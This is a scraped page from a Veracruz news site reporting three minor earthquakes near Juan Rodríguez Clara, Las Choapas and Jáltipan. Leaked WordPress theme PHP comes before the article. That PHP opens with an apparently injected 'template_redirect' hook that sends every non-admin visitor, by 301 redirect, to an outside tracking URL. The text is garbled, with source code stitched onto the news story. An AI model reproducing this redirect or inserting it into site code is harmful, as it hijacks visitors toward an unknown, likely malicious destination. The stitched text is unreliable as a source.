function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * tag.php *--------------------------- * Registers metabox for tag * */ add_filter( 'better-framework/taxonomy/metabox/add', 'publisher_tag_metabox_add', 100 ); if ( ! function_exists( 'publisher_tag_metabox_add' ) ) { /** * Adds metabox for category * * @param $metabox array * * @return array */ function publisher_tag_metabox_add( $metabox ) { $metabox['better-tag-options'] = array( 'panel-id' => publisher_get_theme_panel_id(), ); return $metabox; } } add_filter( 'better-framework/taxonomy/metabox/better-tag-options/config', 'publisher_tag_metabox_config', 100 ); if ( ! function_exists( 'publisher_tag_metabox_config' ) ) { /** * Configs category metaboxe * * @param $config * * @return array */ function publisher_tag_metabox_config( $config ) { // // Support to custom taxonomies // $tag_taxonomies = array( 'post_tag' ); if ( publisher_get_option( 'advanced_tag_options_tax' ) != '' ) { $tag_taxonomies = array_merge( explode( ',', publisher_get_option( 'advanced_tag_options_tax' ) ), $tag_taxonomies ); } return array( 'taxonomies' => $tag_taxonomies, 'name' => sprintf( __( '%s Tag Options', 'publisher' ), publisher_white_label_get_option( 'publisher' ) ) ); } // publisher_metabox_config } // if add_filter( 'better-framework/taxonomy/metabox/better-tag-options/std', 'publisher_tag_metabox_std', 100 ); if ( ! function_exists( 'publisher_tag_metabox_std' ) ) { /** * Configs category metaboxe STD's * * @param $fields * * @return array */ function publisher_tag_metabox_std( $fields ) { include PUBLISHER_THEME_PATH . 'includes/options/tag-std.php'; return $fields; } } add_filter( 'better-framework/taxonomy/metabox/better-tag-options/fields', 'publisher_tag_metabox_fields', 100 ); if ( ! function_exists( 'publisher_tag_metabox_fields' ) ) { /** * Configs category metaboxe fields * * @param $fields * * @return array */ function publisher_tag_metabox_fields( $fields ) { include PUBLISHER_THEME_PATH . 'includes/options/tag-fields.php'; return $fields; } } Tiembla en Rodríguez Clara, Las Choapas y Jáltipan – Coatza Noticias

Tiembla en Rodríguez Clara, Las Choapas y Jáltipan

El Sismológico Nacional reportó dos sismos consecutivos en menos de una hora en el estado de Veracruz, el primero, registrado a las 02:11:40 horas de magnitud 3.7 al sur del municipio de Juan Rodríguez Clara, Veracruz:

“SISMO Magnitud 3.7 Loc. 40 km al SUR de J RODRIGUEZ CLARA, VER 16/05/22 02:11:40 Lat 17.63 Lon -95.45 Pf 104 km”

Posteriormente, el reportó otro sismo de magnitud 3.4, a las 03:25:17 horas, al sur del municipio de Las Choapas, Veracruz:

“SISMO Magnitud 3.4 Loc. 68 km al SUR de LAS CHOAPAS, VER 16/05/22 03:25:17 Lat 17.31 Lon -94.23 Pf 155

Cabe destacar que previamente, la noche de este domingo el Sismológico Nacional reportó otro sismo de magnitud 3.5 al sur de Jáltipan.

“SISMO Magnitud 3.5 Loc. 57 km al SUR de JALTIPAN DEMORELOS, VER 15/05/22 22:39:35 Lat 17.45 Lon -94.64 Pf 141 km”

Fuente: XEU Noticias

Leave A Reply

Your email address will not be published.